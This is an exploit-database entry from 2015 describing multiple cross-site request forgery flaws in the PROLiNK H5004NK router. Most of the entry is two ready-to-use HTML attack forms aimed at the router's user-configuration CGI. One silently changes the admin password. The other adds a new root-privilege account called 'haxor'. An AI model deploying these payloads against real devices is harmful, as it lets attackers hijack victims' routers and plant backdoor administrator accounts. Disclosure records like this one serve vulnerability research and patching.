Prolink H5004NK Cross Site Request Forgery Vulnerability

2015-04-21T00:00:00
ID 1337DAY-ID-23561
Type zdt
Reporter Osanda Malith
Modified 2015-04-21T00:00:00

Description

PROLiNK H5004NK suffers from multiple cross site request forgery vulnerabilities.

                                        
                                            # Exploit Title:  PROLiNK H5004NK Multiple Vulnerabilities
# Date: 16-04-2015
# Firmware: R76S Slt 4WNE1 6.1R 
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Disclaimer: Use this for educational purposes only!


#1| Admin Password Manipulation XSRF 
-----------------------------------------------------

<html>
  <body>
    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="oldpass" value="password" />
      <input type="hidden" name="newpass" value="admin" />
      <input type="hidden" name="confpass" value="admin" />
      <input type="hidden" name="modify" value="Modify" />
      <input type="hidden" name="select" value="s0" />
      <input type="hidden" name="hiddenpass" value="password" />
      <input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#2| Adding a New Root Account XSRF 
-----------------------------------------------------

<html>
  <body>
    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
      <input type="hidden" name="username" value="haxor" />
      <input type="hidden" name="privilege" value="2" />
      <input type="hidden" name="newpass" value="123" />
      <input type="hidden" name="confpass" value="123" />
      <input type="hidden" name="adduser" value="Add" />
      <input type="hidden" name="hiddenpass" value="" />
      <input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2018-04-09]  #